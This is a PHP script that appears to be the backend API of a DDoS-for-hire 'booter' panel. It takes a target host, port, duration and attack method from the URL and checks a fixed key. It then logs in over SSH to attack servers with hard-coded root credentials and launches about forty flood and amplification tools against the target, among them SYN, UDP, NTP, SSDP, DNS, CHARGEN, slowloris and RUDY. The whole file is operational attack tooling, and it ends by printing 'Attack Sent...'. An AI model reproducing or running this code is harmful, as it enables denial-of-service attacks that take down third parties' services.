api

1. <?php
2. if (!function_exists('ssh2_connect'))
3. {
4.     die("Install ssh2 module.\n");
5. }
6. if ($_GET['key'] != "key")
7. {
8.     die("Go Fuck Yourself...");
9. }
10. if (isset($_GET['host'], $_GET['port'], $_GET['time'], $_GET['method'])) {
11.         $SERVERS = array(
12.                 "server"       =>      array("root", "password")
13.                 );
14.         class ssh2 {
15.                 var $connection;
16.                 function __construct($host, $user, $pass) {
17.                         if (!$this->connection = ssh2_connect($host, 22))
18.                                 throw new Exception("Error connecting to server");
19.                         if (!ssh2_auth_password($this->connection, $user, $pass))
20.                                 throw new Exception("Error with login credentials");
21.                 }
22.  
23.                 function exec($cmd) {
24.                         if (!ssh2_exec($this->connection, $cmd))
25.                                 throw new Exception("Error executing command: $cmd");
26.  
27.                         ssh2_exec($this->connection, 'exit');
28.                         unset($this->connection);
29.                 }
30.         }
31.         $port = (int)$_GET['port'] > 0 && (int)$_GET['port'] < 65536 ? $_GET['port'] : 80;
32.         $port = preg_replace('/\D/', '', $port);
33.         $ip = preg_match('/^[a-zA-Z0-9\.-_]+$/', $_GET['host']) ? $_GET['host'] : die();
34.         $time = (int)$_GET['time'] > 0 && (int)$_GET['time'] < (60*60) ? (int)$_GET['time'] : 30;
35.         $time = preg_replace('/\D/', '', $time);
36.         $domain = $_GET['host'];
37.         if(!filter_var($domain, FILTER_VALIDATE_URL) && !filter_var($domain, FILTER_VALIDATE_IP))
38.         {
39.             die("Invalid Domain");
40.         }
41.         $smIP = str_replace(".", "", $ip);
42.         $smDomain = str_replace(".", "", $domain);
43.         $smDomain = str_replace("http://", "", $smDomain);
44.         if($_GET['method'] == "UDP") { $command = "screen -dmS {$smIP} ./udp {$ip} {$port} 1 500 15 {$time}"; }
45.         elseif($_GET['method'] == "TCP") { $command = "screen -dmS {$smIP} ./tcp {$ip} {$port} 15 -1 {$time}"; }
46.         elseif($_GET['method'] == "CSYN") { $command = "screen -dmS {$smIP} ./csyn {$ip} {$port} 15 -1 {$time}"; }
47.         elseif($_GET['method'] == "TCP-ACK") { $command = "screen -dmS {$smIP} ./tcp-ack {$ip} 15 -1 {$time}"; }
48.         elseif($_GET['method'] == "TCP-PSH") { $command = "screen -dmS {$smIP} ./tcp-psh {$ip} 15 -1 {$time}"; }
49.         elseif($_GET['method'] == "TCP-SE") { $command = "screen -dmS {$smIP} ./tcp-se {$ip} {$port} 15 -1 {$time}"; }
50.         elseif($_GET['method'] == "WIZARD") { $command = "screen -dmS {$smIP} ./wizard {$ip} {$port} 15 -1 {$time}"; }
51.         elseif($_GET['method'] == "ZAP") { $command = "screen -dmS {$smIP} ./zap {$ip} {$port} 15 -1 {$time}"; }
52.         elseif($_GET['method'] == "ISSYN") { $command = "screen -dmS {$smIP} ./issyn {$ip} 15 -1 {$time}"; }
53.         elseif($_GET['method'] == "TCP-FIN") { $command = "screen -dmS {$smIP} ./tcp-fin {$ip} 15 -1 {$time}"; }
54.         elseif($_GET['method'] == "TCP-RST") { $command = "screen -dmS {$smIP} ./tcp-rst {$ip} 15 -1 {$time}"; }
55.         elseif($_GET['method'] == "TCP-XMAS") { $command = "screen -dmS {$smIP} ./tcp-xmas {$ip} 15 -1 {$time}"; }
56.         elseif($_GET['method'] == "ZSYN") { $command = "screen -dmS {$smIP} ./zsyn {$ip} {$port} 15 -1 {$time}"; }
57.         elseif($_GET['method'] == "HOME") { $command = "screen -dmS {$smIP} ./home {$ip} {$port} 15 -1 {$time}"; }
58.         elseif($_GET['method'] == "TELNET") { $command = "screen -dmS {$smIP} ./telnet {$ip} 15 -1 {$time}"; }
59.         elseif($_GET['method'] == "DB2") { $command = "screen -dmS {$smIP} ./db2{$ip} {$port} db2.txt 15 -1 {$time}"; }
60.         elseif($_GET['method'] == "DOMINATE") { $command = "screen -dmS {$smIP} ./dominate {$ip} {$port} 15 -1 {$time}"; }
61.         elseif($_GET['method'] == "SSYN") { $command = "screen -dmS {$smIP} ./ssyn {$ip} {$port} 15 -1 {$time}"; }
62.         elseif($_GET['method'] == "XSYN") { $command = "screen -dmS {$smIP} ./xsyn {$ip} {$port} 15 -1 {$time}"; }
63.         elseif($_GET['method'] == "SSDP") { $command = "screen -dmS {$smIP} ./ssdp {$ip} {$port} ssdp.txt 15 -1 {$time}"; }
64.         elseif($_GET['method'] == "CHARGEN") { $command = "screen -dmS {$smIP} ./chargen {$ip} {$port} chargen.txt 15 -1 {$time}"; }
65.         elseif($_GET['method'] == "TS3") { $command = "screen -dmS {$smIP} ./ts3 {$ip} {$port} ts3.txt 15 -1 {$time}"; }
66.         elseif($_GET['method'] == "NTP") { $command = "screen -dmS {$smIP} ./ntp {$ip} {$port} ntp.txt 15 -1 {$time}"; }
67.         elseif($_GET['method'] == "SNMP") { $command = "screen -dmS {$smIP} ./snmp {$ip} {$port} snmp.txt 15 -1 {$time}"; }
68.         elseif($_GET['method'] == "SENTINEL") { $command = "screen -dmS {$smIP} ./sentinel {$ip} {$port} sentinel.txt 15 -1 {$time}"; }
69.         elseif($_GET['method'] == "MSSQL") { $command = "screen -dmS {$smIP} ./mssql {$ip} {$port} mssql.txt 15 -1 {$time}"; }
70.         elseif($_GET['method'] == "PORTMAP") { $command = "screen -dmS {$smIP} ./portmap {$ip} {$port} portmap.txt 15 -1 {$time}"; }
71.         elseif($_GET['method'] == "QOTD") { $command = "screen -dmS {$smIP} ./qotd {$ip} {$port} qotd.txt -1 8 {$time}"; }
72.         elseif($_GET['method'] == "MDNS") { $command = "screen -dmS {$smIP} ./mdns {$ip} {$port} mdns.txt 3 {$time}"; }
73.         elseif($_GET['method'] == "NETBIOS") { $command = "screen -dmS {$smIP} ./netbios {$ip} {$port} netbios.txt 15 -1 {$time}"; }
74.         elseif($_GET['method'] == "HEARTBLEED") { $command = "screen -dmS {$smIP} ./heartbleed {$ip} {$port} heartbleed.txt 15 -1 {$time}"; }
75.         elseif($_GET['method'] == "VSE") { $command = "screen -dmS {$smIP} ./vse {$ip} 15 -1 {$time}"; }
76.         elseif($_GET['method'] == "RUDY") { $command = "screen -dmS {$smIP} ./rudy {$ip} 1 8 {$time} proxy.txt 0"; }
77.         elseif($_GET['method'] == "SYN") { $command = "screen -dmS {$smIP} ./syn {$ip} {$port} {$time}"; }
78.         elseif($_GET['method'] == "DNS") { $command = "screen -dmS {$smIP} ./dns {$ip} {$port} dns.txt 15 -1 {$time}"; }
79.         elseif($_GET['method'] == "QUAKE") { $command = "screen -dmS {$smIP} ./quake {$ip} {$port} quake.txt 8 {$time}"; }
80.         elseif($_GET['method'] == "SLOW") { $command = "screen -dmS {$smIP} ./slow {$ip} 8 proxy.txt {$time} 0"; }
81.         elseif($_GET['method'] == "ESSYN") { $command = "screen -dmS {$smIP} ./essyn {$ip} {$ip} {$port} 15 -1 {$time}"; }
82.         elseif($_GET['method'] == "stop") { $command = "screen -X -s {$smIP} quit"; }
83.         else die();
84.         foreach ($SERVERS as $server=>$credentials) {
85.                 $disposable = new ssh2($server, $credentials[0], $credentials[1]);
86.                 $disposable->exec($command);
87. }
88. }
89. ?>
90. Attack Sent...